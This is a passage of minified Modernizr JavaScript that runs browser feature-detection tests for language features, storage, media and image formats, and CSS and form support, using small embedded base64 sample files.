strict";return!this}()),Modernizr.addTest("es5string",function(){return!(!String.prototype||!String.prototype.trim)}),Modernizr.addTest("es5syntax",function(){var value,obj,stringAccess,getter,setter,reservedWords,zeroWidthChars;try{return stringAccess=eval('"foobar"[3] === "b"'),getter=eval("({ get x(){ return 1 } }).x === 1"),eval("({ set x(v){ value = v; } }).x = 1"),setter=1===value,eval("obj = ({ if: 1 })"),reservedWords=1===obj["if"],zeroWidthChars=eval("_\u200c\u200d = true"),stringAccess&&getter&&setter&&reservedWords&&zeroWidthChars}catch(ignore){return!1}}),Modernizr.addTest("es5undefined",function(){var e,t;try{t=window.undefined,window.undefined=12345,e="undefined"==typeof window.undefined,window.undefined=t}catch(n){return!1}return e}),Modernizr.addTest("es5",function(){return!!(Modernizr.es5array&&Modernizr.es5date&&Modernizr.es5function&&Modernizr.es5object&&Modernizr.strictmode&&Modernizr.es5string&&Modernizr.json&&Modernizr.es5syntax&&Modernizr.es5undefined)}),Modernizr.addTest("es6array",!!(Array.prototype&&Array.prototype.copyWithin&&Array.prototype.fill&&Array.prototype.find&&Array.prototype.findIndex&&Array.prototype.keys&&Array.prototype.entries&&Array.prototype.values&&Array.from&&Array.of)),Modernizr.addTest("generators",function(){try{new Function("function* test() {}")()}catch(e){return!1}return!0}),Modernizr.addTest("es6math",!!(Math&&Math.clz32&&Math.cbrt&&Math.imul&&Math.sign&&Math.log10&&Math.log2&&Math.log1p&&Math.expm1&&Math.cosh&&Math.sinh&&Math.tanh&&Math.acosh&&Math.asinh&&Math.atanh&&Math.hypot&&Math.trunc&&Math.fround)),Modernizr.addTest("es6number",!!(Number.isFinite&&Number.isInteger&&Number.isSafeInteger&&Number.isNaN&&Number.parseInt&&Number.parseFloat&&Number.isInteger(Number.MAX_SAFE_INTEGER)&&Number.isInteger(Number.MIN_SAFE_INTEGER)&&Number.isFinite(Number.EPSILON))),Modernizr.addTest("es6object",!!(Object.assign&&Object.is&&Object.setPrototypeOf)),Modernizr.addTest("promises",function(){return"Promise"in window&&"resolve"in window.Promise&&"reject"in window.Promise&&"all"in window.Promise&&"race"in window.Promise&&function(){var e;return new window.Promise(function(t){e=t}),"function"==typeof e}()}),Modernizr.addTest("es6string",!!(String.fromCodePoint&&String.raw&&String.prototype.codePointAt&&String.prototype.repeat&&String.prototype.startsWith&&String.prototype.endsWith&&String.prototype.contains)),Modernizr.addTest("devicemotion","DeviceMotionEvent"in window),Modernizr.addTest("deviceorientation","DeviceOrientationEvent"in window),Modernizr.addTest("filereader",!!(window.File&&window.FileList&&window.FileReader)),Modernizr.addTest("beacon","sendBeacon"in navigator),Modernizr.addTest("lowbandwidth",function(){var e=navigator.connection||{type:0};return 3==e.type||4==e.type||/^[23]g$/.test(e.type)}),Modernizr.addTest("eventsource","EventSource"in window),Modernizr.addTest("fetch","fetch"in window),Modernizr.addTest("xhrresponsetype",function(){if("undefined"==typeof XMLHttpRequest)return!1;var e=new XMLHttpRequest;return e.open("get","/",!0),"response"in e}()),Modernizr.addTest("xhr2","XMLHttpRequest"in window&&"withCredentials"in new XMLHttpRequest),Modernizr.addTest("speechsynthesis","SpeechSynthesisUtterance"in window),Modernizr.addTest("localstorage",function(){var e="modernizr";try{return localStorage.setItem(e,e),localStorage.removeItem(e),!0}catch(t){return!1}}),Modernizr.addTest("sessionstorage",function(){var e="modernizr";try{return sessionStorage.setItem(e,e),sessionStorage.removeItem(e),!0}catch(t){return!1}}),Modernizr.addTest("websqldatabase","openDatabase"in window),Modernizr.addTest("svgfilters",function(){var e=!1;try{e="SVGFEColorMatrixElement"in window&&2==SVGFEColorMatrixElement.SVG_FECOLORMATRIX_TYPE_SATURATE}catch(t){}return e}),Modernizr.addTest("urlparser",function(){var e;try{return e=new URL("http://modernizr.com/"),"http://modernizr.com/"===e.href}catch(t){return!1}}),Modernizr.addTest("websocketsbinary",function(){var e,t="https:"==location.protocol?"wss":"ws";if("WebSocket"in window){if(e="binaryType"in WebSocket.prototype)return e;try{return!!new WebSocket(t+"://.").binaryType}catch(n){}}return!1}),Modernizr.addTest("framed",window.location!=top.location),Modernizr.addTest("sharedworkers","SharedWorker"in window),Modernizr.addTest("webworkers","Worker"in window);var prefixes=ModernizrProto._config.usePrefixes?" -webkit- -moz- -o- -ms- ".split(" "):[];ModernizrProto._prefixes=prefixes,Modernizr.addTest("contains",is(String.prototype.contains,"function"));var hasOwnProp;!function(){var e={}.hasOwnProperty;hasOwnProp=is(e,"undefined")||is(e.call,"undefined")?function(e,t){return t in e&&is(e.constructor.prototype[t],"undefined")}:function(t,n){return e.call(t,n)}}(),ModernizrProto._l={},ModernizrProto.on=function(e,t){this._l[e]||(this._l[e]=[]),this._l[e].push(t),Modernizr.hasOwnProperty(e)&&setTimeout(function(){Modernizr._trigger(e,Modernizr[e])},0)},ModernizrProto._trigger=function(e,t){if(this._l[e]){var n=this._l[e];setTimeout(function(){var e,i;for(e=0;e<n.length;e++)(i=n[e])(t)},0),delete this._l[e]}},Modernizr._q.push(function(){ModernizrProto.addTest=addTest}),Modernizr.addAsyncTest(function(){var e=new Image;e.onerror=function(){addTest("exiforientation",!1,{aliases:["exif-orientation"]})},e.onload=function(){addTest("exiforientation",2!==e.width,{aliases:["exif-orientation"]})},e.src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAYABgAAD/4QAiRXhpZgAASUkqAAgAAAABABIBAwABAAAABgASAAAAAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAABAAIDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD+/iiiigD/2Q=="; }),Modernizr.addAsyncTest(function(){function e(){clearTimeout(t),window.removeEventListener("deviceproximity",e),addTest("proximity",!0)}var t,n=300;"ondeviceproximity"in window&&"onuserproximity"in window?(window.addEventListener("deviceproximity",e),t=setTimeout(function(){window.removeEventListener("deviceproximity",e),addTest("proximity",!1)},n)):addTest("proximity",!1)}),Modernizr.addAsyncTest(function(){var e=new Image;e.onload=e.onerror=function(){addTest("jpeg2000",1==e.width)},e.src="data:image/jp2;base64,/0//UQAyAAAAAAABAAAAAgAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAAAEBwEBBwEBBwEBBwEB/1IADAAAAAEAAAQEAAH/XAAEQED/ZAAlAAFDcmVhdGVkIGJ5IE9wZW5KUEVHIHZlcnNpb24gMi4wLjD/kAAKAAAAAABYAAH/UwAJAQAABAQAAf9dAAUBQED/UwAJAgAABAQAAf9dAAUCQED/UwAJAwAABAQAAf9dAAUDQED/k8+kEAGvz6QQAa/PpBABr994EAk//9k="}),Modernizr.addAsyncTest(function(){var e=new Image;e.onload=e.onerror=function(){addTest("jpegxr",1==e.width,{aliases:["jpeg-xr"]})},e.src="data:image/vnd.ms-photo;base64,SUm8AQgAAAAFAAG8AQAQAAAASgAAAIC8BAABAAAAAQAAAIG8BAABAAAAAQAAAMC8BAABAAAAWgAAAMG8BAABAAAAHwAAAAAAAAAkw91vA07+S7GFPXd2jckNV01QSE9UTwAZAYBxAAAAABP/gAAEb/8AAQAAAQAAAA=="}),Modernizr.addAsyncTest(function(){var e=new Image;e.onerror=function(){addTest("webpalpha",!1,{aliases:["webp-alpha"]})},e.onload=function(){addTest("webpalpha",1==e.width,{aliases:["webp-alpha"]})},e.src="data:image/webp;base64,UklGRkoAAABXRUJQVlA4WAoAAAAQAAAAAAAAAAAAQUxQSAwAAAABBxAR/Q9ERP8DAABWUDggGAAAADABAJ0BKgEAAQADADQlpAADcAD++/1QAA=="}),Modernizr.addAsyncTest(function(){var e=new Image;e.onerror=function(){addTest("webpanimation",!1,{aliases:["webp-animation"]})},e.onload=function(){addTest("webpanimation",1==e.width,{aliases:["webp-animation"]})},e.src="data:image/webp;base64,UklGRlIAAABXRUJQVlA4WAoAAAASAAAAAAAAAAAAQU5JTQYAAAD/////AABBTk1GJgAAAAAAAAAAAAAAAAAAAGQAAABWUDhMDQAAAC8AAAAQBxAREYiI/gcA"}),Modernizr.addAsyncTest(function(){var e=new Image;e.onerror=function(){addTest("webplossless",!1,{aliases:["webp-lossless"]})},e.onload=function(){addTest("webplossless",1==e.width,{aliases:["webp-lossless"]})},e.src="data:image/webp;base64,UklGRh4AAABXRUJQVlA4TBEAAAAvAAAAAAfQ//73v/+BiOh/AAA="}),Modernizr.addAsyncTest(function(){function e(e,t,n){function i(t){var i=t&&"load"===t.type?1==r.width:!1,o="webp"===e;addTest(e,o?new Boolean(i):i),n&&n(t)}var r=new Image;r.onerror=i,r.onload=i,r.src=t}var t=[{uri:"data:image/webp;base64,UklGRiQAAABXRUJQVlA4IBgAAAAwAQCdASoBAAEAAwA0JaQAA3AA/vuUAAA=",name:"webp"},{uri:"data:image/webp;base64,UklGRkoAAABXRUJQVlA4WAoAAAAQAAAAAAAAAAAAQUxQSAwAAAABBxAR/Q9ERP8DAABWUDggGAAAADABAJ0BKgEAAQADADQlpAADcAD++/1QAA==",name:"webp.alpha"},{uri:"data:image/webp;base64,UklGRlIAAABXRUJQVlA4WAoAAAASAAAAAAAAAAAAQU5JTQYAAAD/////AABBTk1GJgAAAAAAAAAAAAAAAAAAAGQAAABWUDhMDQAAAC8AAAAQBxAREYiI/gcA",name:"webp.animation"},{uri:"data:image/webp;base64,UklGRh4AAABXRUJQVlA4TBEAAAAvAAAAAAfQ//73v/+BiOh/AAA=",name:"webp.lossless"}],n=t.shift();e(n.name,n.uri,function(n){if(n&&"load"===n.type)for(var i=0;i<t.length;i++)e(t[i].name,t[i].uri)})}),Modernizr.addTest("svgasimg",document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1")),Modernizr.addAsyncTest(function(){function e(){var e=new Image;e.onerror=function(){addTest("datauri",!0),Modernizr.datauri=new Boolean(!0),Modernizr.datauri.over32kb=!1},e.onload=function(){addTest("datauri",!0),Modernizr.datauri=new Boolean(!0),Modernizr.datauri.over32kb=1==e.width&&1==e.height};for(var t="R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==";t.length<33e3;)t="\r\n"+t;e.src="data:image/gif;base64,"+t}-1!==navigator.userAgent.indexOf("MSIE 7.")&&setTimeout(function(){addTest("datauri",!1)},10);var t=new Image;t.onerror=function(){addTest("datauri",!1)},t.onload=function(){1==t.width&&1==t.height?e():addTest("datauri",!1)},t.src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw=="}),Modernizr.addAsyncTest(function(){function e(){addTest("blobworkers",!1),t()}function t(){a&&i.revokeObjectURL(a),s&&s.terminate(),l&&clearTimeout(l)}try{var n=window.BlobBuilder,i=window.URL;Modernizr._config.usePrefix&&(n=n||window.MozBlobBuilder||window.WebKitBlobBuilder||window.MSBlobBuilder||window.OBlobBuilder,i=i||window.MozURL||window.webkitURL||window.MSURL||window.OURL);var r,o,s,a,l,d="Modernizr",c="this.onmessage=function(e){postMessage(e.data)}";try{r=new Blob([c],{type:"text/javascript"})}catch(u){}r||(o=new n,o.append(c),r=o.getBlob()),a=i.createObjectURL(r),s=new Worker(a),s.onmessage=function(e){addTest("blobworkers",d===e.data),t()},s.onerror=e,l=setTimeout(e,200),s.postMessage(d)}catch(u){e()}}),Modernizr.addAsyncTest(function(){try{var e="Modernizr",t=new Worker("data:text/javascript;base64,dGhpcy5vbm1lc3NhZ2U9ZnVuY3Rpb24oZSl7cG9zdE1lc3NhZ2UoZS5kYXRhKX0=");t.onmessage=function(n){t.terminate(),addTest("dataworkers",e===n.data),t=null},t.onerror=function(){addTest("dataworkers",!1),t=null},setTimeout(function(){addTest("dataworkers",!1)},200),t.postMessage(e)}catch(n){setTimeout(function(){addTest("dataworkers",!1)},0)}});var omPrefixes="Moz O ms Webkit",domPrefixes=ModernizrProto._config.usePrefixes?omPrefixes.toLowerCase().split(" "):[];ModernizrProto._domPrefixes=domPrefixes;var cssomPrefixes=ModernizrProto._config.usePrefixes?omPrefixes.split(" "):[];ModernizrProto._cssomPrefixes=cssomPrefixes;var atRule=function(e){var t,n=prefixes.length,i=window.CSSRule;if("undefined"==typeof i)return undefined;if(!e)return!1;if(e=e.replace(/^@/,""),t=e.replace(/-/g,"_").toUpperCase()+"_RULE",t in i)return"@"+e;for(var r=0;n>r;r++){var o=prefixes[r],s=o.toUpperCase()+"_"+t;if(s in i)return"@-"+o.toLowerCase()+"-"+e}return!1};ModernizrProto.atRule=atRule;var hasEvent=function(e){function t(t,i){var r;return t?(i&&"string"!=typeof i||(i=createElement(i||"div")),t="on"+t,r=t in i,!r&&n&&(i.setAttribute||(i=createElement("div")),i.setAttribute(t,""),r="function"==typeof i[t],i[t]!==e&&(i[t]=e),i.removeAttribute(t)),r):!1}var n=!("onblur"in document.documentElement);return t}();ModernizrProto.hasEvent=hasEvent,Modernizr.addTest("ambientlight",hasEvent("devicelight",window)),Modernizr.addTest("hashchange",function(){return hasEvent("hashchange",window)===!1?!1:document.documentMode===undefined||document.documentMode>7}),Modernizr.addTest("inputsearchevent",hasEvent("search")),Modernizr.addTest("pointerevents",function(){var e=!1,t=domPrefixes.length;for(e=Modernizr.hasEvent("pointerdown");t--&&!e;)hasEvent(domPrefixes[t]+"pointerdown")&&(e=!0);return e});var prefixedCSSValue=function(e,t){var n=!1,i=createElement("div"),r=i.style;if(e in r){var o=domPrefixes.length;for(r[e]=t,n=r[e];o--&&!n;)r[e]="-"+domPrefixes[o]+"-"+t,n=r[e]}return""===n&&(n=!1),n};ModernizrProto.prefixedCSSValue=prefixedCSSValue,Modernizr.addTest("audio",function(){var e=createElement("audio"),t=!1;try{(t=!!e.canPlayType)&&(t=new Boolean(t),t.ogg=e.canPlayType('audio/ogg; codecs="vorbis"').replace(/^no$/,""),t.mp3=e.canPlayType("audio/mpeg;").replace(/^no$/,""),t.opus=e.canPlayType('audio/ogg; codecs="opus"').replace(/^no$/,""),t.wav=e.canPlayType('audio/wav; codecs="1"').replace(/^no$/,""),t.m4a=(e.canPlayType("audio/x-m4a;")||e.canPlayType("audio/aac;")).replace(/^no$/,""))}catch(n){}return t}),Modernizr.addTest("canvas",function(){var e=createElement("canvas");return!(!e.getContext||!e.getContext("2d"))}),Modernizr.addTest("canvastext",function(){return Modernizr.canvas===!1?!1:"function"==typeof createElement("canvas").getContext("2d").fillText}),Modernizr.addTest("contenteditable",function(){if("contentEditable"in docElement){var e=createElement("div");return e.contentEditable=!0,"true"===e.contentEditable}}),Modernizr.addTest("emoji",function(){if(!Modernizr.canvastext)return!1;var e=window.devicePixelRatio||1,t=12*e,n=createElement("canvas"),i=n.getContext("2d");return i.fillStyle="#f00",i.textBaseline="top",i.font="32px Arial",i.fillText("\ufffd",0,0),0!==i.getImageData(t,t,1,1).data[0]}),addTest("htmlimports","import"in createElement("link")),Modernizr.addTest("olreversed","reversed"in createElement("ol")),Modernizr.addTest("userdata",!!createElement("div").addBehavior),Modernizr.addTest("video",function(){var e=createElement("video"),t=!1;try{(t=!!e.canPlayType)&&(t=new Boolean(t),t.ogg=e.canPlayType('video/ogg; codecs="theora"').replace(/^no$/,""),t.h264=e.canPlayType('video/mp4; codecs="avc1.42E01E"').replace(/^no$/,""),t.webm=e.canPlayType('video/webm; codecs="vp8, vorbis"').replace(/^no$/,""),t.vp9=e.canPlayType('video/webm; codecs="vp9"').replace(/^no$/,""),t.hls=e.canPlayType('application/x-mpegURL; codecs="avc1.42E01E"').replace(/^no$/,""))}catch(n){}return t}),Modernizr.addTest("vml",function(){var e,t=createElement("div"),n=!1;return isSVG||(t.innerHTML='<v:shape id="vml_flag1" adj="1" />',e=t.firstChild,e.style.behavior="url(#default#VML)",n=e?"object"==typeof e.adj:!0),n}),Modernizr.addTest("webanimations","animate"in createElement("div")),Modernizr.addTest("webgl",function(){var e=createElement("canvas"),t="probablySupportsContext"in e?"probablySupportsContext":"supportsContext";return t in e?e[t]("webgl")||e[t]("experimental-webgl"):"WebGLRenderingContext"in window}),Modernizr.addTest("adownload",!window.externalHost&&"download"in createElement("a")),Modernizr.addTest("audioloop","loop"in createElement("audio")),Modernizr.addTest("audiopreload","preload"in createElement("audio")),Modernizr.addTest("canvasblending",function(){if(Modernizr.canvas===!1)return!1;var e=createElement("canvas").getContext("2d");try{e.globalCompositeOperation="screen"}catch(t){}return"screen"===e.globalCompositeOperation});var canvas=createElement("canvas");Modernizr.addTest("todataurljpeg",function(){return!!Modernizr.canvas&&0===canvas.toDataURL("image/jpeg").indexOf("data:image/jpeg")}),Modernizr.addTest("todataurlpng",function(){return!!Modernizr.canvas&&0===canvas.toDataURL("image/png").indexOf("data:image/png")}),Modernizr.addTest("todataurlwebp",function(){var e=!1;try{e=!!Modernizr.canvas&&0===canvas.toDataURL("image/webp").indexOf("data:image/webp")}catch(t){}return e}),Modernizr.addTest("canvaswinding",function(){if(Modernizr.canvas===!1)return!1;var e=createElement("canvas").getContext("2d");return e.rect(0,0,10,10),e.rect(2,2,6,6),e.isPointInPath(5,5,"evenodd")===!1}),Modernizr.addTest("bgpositionshorthand",function(){var e=createElement("a"),t=e.style,n="right 10px bottom 10px";return t.cssText="background-position: "+n+";",t.backgroundPosition===n}),Modernizr.addTest("csscalc",function(){var e="width:",t="calc(10px);",n=createElement("a");return n.style.cssText=e+prefixes.join(t+e),!!n.style.length}),Modernizr.addTest("cubicbezierrange",function(){var e=createElement("a");return e.style.cssText=prefixes.join("transition-timing-function:cubic-bezier(1,0,0,1.1); "),!!e.style.length}),Modernizr.addTest("cssgradients",function(){var e="background-image:",t="gradient(linear,left top,right bottom,from(#9f9),to(white));",n="linear-gradient(left top,#9f9, white);",i=e+prefixes.join(n+e).slice(0,-e.length);Modernizr._config.usePrefixes&&(i+=e+"-webkit-"+t);var r=createElement("a"),o=r.style;return o.cssText=i,(""+o.backgroundImage).indexOf("gradient")>-1}),Modernizr.addTest("multiplebgs",function(){var e=createElement("a").style;return e.cssText="background:url(https://),url(https://),red url(https://)",/(url\s*\(.*?){3}/.test(e.background)}),Modernizr.addTest("opacity",function(){var e=createElement("a").style;return e.cssText=prefixes.join("opacity:.55;"),/^0.55$/.test(e.opacity)}),Modernizr.addTest("csspointerevents",function(){var e=createElement("a").style;return e.cssText="pointer-events:auto","auto"===e.pointerEvents}),Modernizr.addTest("csspositionsticky",function(){var e="position:",t="sticky",n=createElement("a"),i=n.style;return i.cssText=e+prefixes.join(t+";"+e).slice(0,-e.length),-1!==i.position.indexOf(t)}),Modernizr.addTest("regions",function(){if(isSVG)return!1;var e=Modernizr.prefixed("flowFrom"),t=Modernizr.prefixed("flowInto"),n=!1;if(!e||!t)return n;var i=createElement("iframe"),r=createElement("div"),o=createElement("div"),s=createElement("div"),a="modernizr_flow_for_regions_check";o.innerText="M",r.style.cssText="top: 150px; left: 150px; padding: 0px;",s.style.cssText="width: 50px; height: 50px; padding: 42px;",s.style[e]=a,r.appendChild(o),r.appendChild(s),docElement.appendChild(r);var l,d,c=o.getBoundingClientRect();return o.style[t]=a,l=o.getBoundingClientRect(),d=parseInt(l.left-c.left,10),docElement.removeChild(r),42==d?n=!0:(docElement.appendChild(i),c=i.getBoundingClientRect(),i.style[t]=a,l=i.getBoundingClientRect(),c.height>0&&c.height!==l.height&&0===l.height&&(n=!0)),o=s=r=i=undefined,n}),Modernizr.addTest("cssremunit",function(){var e=createElement("a").style;try{e.fontSize="3rem"}catch(t){}return/rem/.test(e.fontSize)}),Modernizr.addTest("rgba",function(){var e=createElement("a").style;return e.cssText="background-color:rgba(150,255,150,.5)",(""+e.backgroundColor).indexOf("rgba")>-1}),Modernizr.addTest("createelementattrs",function(){try{return"test"==createElement('<input name="test" />').getAttribute("name")}catch(e){return!1}},{aliases:["createelement-attrs"]}),Modernizr.addTest("dataset",function(){var e=createElement("div");return e.setAttribute("data-a-b","c"),!(!e.dataset||"c"!==e.dataset.aB)}),Modernizr.addTest("hidden","hidden"in createElement("a")),Modernizr.addTest("outputelem","value"in createElement("output")),Modernizr.addTest("ruby",function(){function e(e,t){var n;return window.getComputedStyle?n=document.defaultView.getComputedStyle(e,null).getPropertyValue(t):e.currentStyle&&(n=e.currentStyle[t]),n}function t(){docElement.removeChild(n),n=null,i=null,r=null}var n=createElement("ruby"),i=createElement("rt"),r=createElement("rp"),o="display",s="fontSize";return n.appendChild(r),n.appendChild(i),docElement.appendChild(n),"none"==e(r,o)||"ruby"==e(n,o)&&"ruby-text"==e(i,o)||"6pt"==e(r,s)&&"6pt"==e(i,s)?(t(),!0):(t(),!1)}),Modernizr.addTest("progressbar",createElement("progress").max!==undefined),Modernizr.addTest("meter",createElement("meter").max!==undefined),Modernizr.addTest("template","content"in createElement("template")),Modernizr.addTest("time","valueAsDate"in createElement("time")),Modernizr.addTest("texttrackapi","function"==typeof createElement("video").addTextTrack),Modernizr.addTest("track","kind"in createElement("track")),Modernizr.addTest("unknownelements",function(){var e=createElement("a");return e.innerHTML="<xyz></xyz>",1===e.childNodes.length}),Modernizr.addTest("capture","capture"in createElement("input")),Modernizr.addTest("fileinput",function(){if(navigator.userAgent.match(/(Android (1.0|1.1|1.5|1.6|2.0|2.1))|(Windows Phone (OS 7|8.0))|(XBLWP)|(ZuneWP)|(w(eb)?OSBrowser)|(webOS)|(Kindle\/(1.0|2.0|2.5|3.0))/))return!1;var e=createElement("input");return e.type="file",!e.disabled}),Modernizr.addTest("fileinputdirectory",function(){var e=createElement("input"),t="directory";if(e.type="file",t in e)return!0;for(var n=0,i=domPrefixes.length;i>n;n++)if(domPrefixes[n]+t in e)return!0;return!1}),Modernizr.addTest("formattribute",function(){var e,t=createElement("form"),n=createElement("input"),i=createElement("div"),r="formtest"+(new Date).getTime(),o=!1;t.id=r;try{n.setAttribute("form",r)}catch(s){document.createAttribute&&(e=document.createAttribute("form"),e.nodeValue=r,n.setAttributeNode(e))}return i.appendChild(t),i.appendChild(n),docElement.appendChild(i),o=t.elements&&1===t.elements.length&&n.form==t,i.parentNode.removeChild(i),o}),Modernizr.addTest("placeholder","placeholder"in createElement("input")&&"placeholder"in createElement("textarea")),Modernizr.addTest("sandbox","sandbox"in createElement("iframe")),Modernizr.addTest("seamless","seamless"in createElement("iframe")),Modernizr.addAsyncTest(function(){if(!Modernizr.canvas)return!1;var e=new Image,t=createElement("canvas"),n=t.getContext("2d");e.onload=function(){addTest("apng",function(){return"undefined"==typeof t.getContext?!1:(n.drawImage(e,0,0),0===n.getImageData(0,0,1,1).data[3])})},e.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACGFjVEwAAAABAAAAAcMq2TYAAAANSURBVAiZY2BgYPgPAAEEAQB9ssjfAAAAGmZjVEwAAAAAAAAAAQAAAAEAAAAAAAAAAAD6A+gBAbNU+2sAAAARZmRBVAAAAAEImWNgYGBgAAAABQAB6MzFdgAAAABJRU5ErkJggg=="}),Modernizr.addTest("srcdoc","srcdoc"in createElement("iframe")),Modernizr.addTest("sizes","sizes"in createElement("img")),Modernizr.addTest("srcset","srcset"in createElement("img")),Modernizr.addTest("inputformaction",!!("formAction"in createElement("input")),{aliases:["input-formaction"]}),Modernizr.addTest("inputformenctype",!!("formEnctype"in createElement("input")),{aliases:["input-formenctype"]}),Modernizr.addTest("inputformmethod",!!("formMethod"in createElement("input"))),Modernizr.addTest("inputformtarget",!!("formtarget"in createElement("input")),{aliases:["input-formtarget"]}),Modernizr.addTest("scriptasync","async"in createElement("script")),Modernizr.addTest("scriptdefer","defer"in createElement("script")),Modernizr.addTest("stylescoped","scoped"in createElement("style")),Modernizr.addTest("inlinesvg",function(){var e=createElement("div");return e.innerHTML="<svg/>","http://www.w3.org/2000/svg"==("undefined"!=typeof SVGRect&&e.firstChild&&e.firstChild.namespaceURI)}),Modernizr.addTest("textareamaxlength",!!("maxLength"in createElement("textarea"))),Modernizr.addTest("videoloop","loop"in createElement("video")),Modernizr.addTest("videopreload","preload"in createElement("video")),Modernizr.addAsyncTest(function(){function e(n){clearTimeout(t),i.removeEventListener("playing",e,!1),addTest("videoautoplay",n&&"playing"===n.type||0!==i.currentTime),i.parentNode.removeChild(i)}var t,n=300,i=createElement("video"),r=i.style;if(!(Modernizr.video&&"autoplay"in i))return void addTest("videoautoplay",!1);r.position="absolute",r.height=0,r.width=0;try{if(Modernizr.video.ogg)i.src="data:video/ogg;base64,T2dnUwACAAAAAAAAAABmnCATAAAAAHDEixYBKoB0aGVvcmEDAgEAAQABAAAQAAAQAAAAAAAFAAAAAQAAAAAAAAAAAGIAYE9nZ1MAAAAAAAAAAAAAZpwgEwEAAAACrA7TDlj///////////////+QgXRoZW9yYSsAAABYaXBoLk9yZyBsaWJ0aGVvcmEgMS4xIDIwMDkwODIyIChUaHVzbmVsZGEpAQAAABoAAABFTkNPREVSPWZmbXBlZzJ0aGVvcmEtMC4yOYJ0aGVvcmG+zSj3uc1rGLWpSUoQc5zmMYxSlKQhCDGMYhCEIQhAAAAAAAAAAAAAEW2uU2eSyPxWEvx4OVts5ir1aKtUKBMpJFoQ/nk5m41mUwl4slUpk4kkghkIfDwdjgajQYC8VioUCQRiIQh8PBwMhgLBQIg4FRba5TZ5LI/FYS/Hg5W2zmKvVoq1QoEykkWhD+eTmbjWZTCXiyVSmTiSSCGQh8PB2OBqNBgLxWKhQJBGIhCHw8HAyGAsFAiDgUCw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDAwPEhQUFQ0NDhESFRUUDg4PEhQVFRUOEBETFBUVFRARFBUVFRUVEhMUFRUVFRUUFRUVFRUVFRUVFRUVFRUVEAwLEBQZGxwNDQ4SFRwcGw4NEBQZHBwcDhATFhsdHRwRExkcHB4eHRQYGxwdHh4dGxwdHR4eHh4dHR0dHh4eHRALChAYKDM9DAwOExo6PDcODRAYKDlFOA4RFh0zV1A+EhYlOkRtZ00YIzdAUWhxXDFATldneXhlSFxfYnBkZ2MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEhIVGRoaGhoSFBYaGhoaGhUWGRoaGhoaGRoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhESFh8kJCQkEhQYIiQkJCQWGCEkJCQkJB8iJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQREhgvY2NjYxIVGkJjY2NjGBo4Y2NjY2MvQmNjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRISEhUXGBkbEhIVFxgZGxwSFRcYGRscHRUXGBkbHB0dFxgZGxwdHR0YGRscHR0dHhkbHB0dHR4eGxwdHR0eHh4REREUFxocIBERFBcaHCAiERQXGhwgIiUUFxocICIlJRcaHCAiJSUlGhwgIiUlJSkcICIlJSUpKiAiJSUlKSoqEBAQFBgcICgQEBQYHCAoMBAUGBwgKDBAFBgcICgwQEAYHCAoMEBAQBwgKDBAQEBgICgwQEBAYIAoMEBAQGCAgAfF5cdH1e3Ow/L66wGmYnfIUbwdUTe3LMRbqON8B+5RJEvcGxkvrVUjTMrsXYhAnIwe0dTJfOYbWrDYyqUrz7dw/JO4hpmV2LsQQvkUeGq1BsZLx+cu5iV0e0eScJ91VIQYrmqfdVSK7GgjOU0oPaPOu5IcDK1mNvnD+K8LwS87f8Jx2mHtHnUkTGAurWZlNQa74ZLSFH9oF6FPGxzLsjQO5Qe0edcpttd7BXBSqMCL4k/4tFrHIPuEQ7m1/uIWkbDMWVoDdOSuRQ9286kvVUlQjzOE6VrNguN4oRXYGkgcnih7t13/9kxvLYKQezwLTrO44sVmMPgMqORo1E0sm1/9SludkcWHwfJwTSybR4LeAz6ugWVgRaY8mV/9SluQmtHrzsBtRF/wPY+X0JuYTs+ltgrXAmlk10xQHmTu9VSIAk1+vcvU4ml2oNzrNhEtQ3CysNP8UeR35wqpKUBdGdZMSjX4WVi8nJpdpHnbhzEIdx7mwf6W1FKAiucMXrWUWVjyRf23chNtR9mIzDoT/6ZLYailAjhFlZuvPtSeZ+2oREubDoWmT3TguY+JHPdRVSLKxfKH3vgNqJ/9emeEYikGXDFNzaLj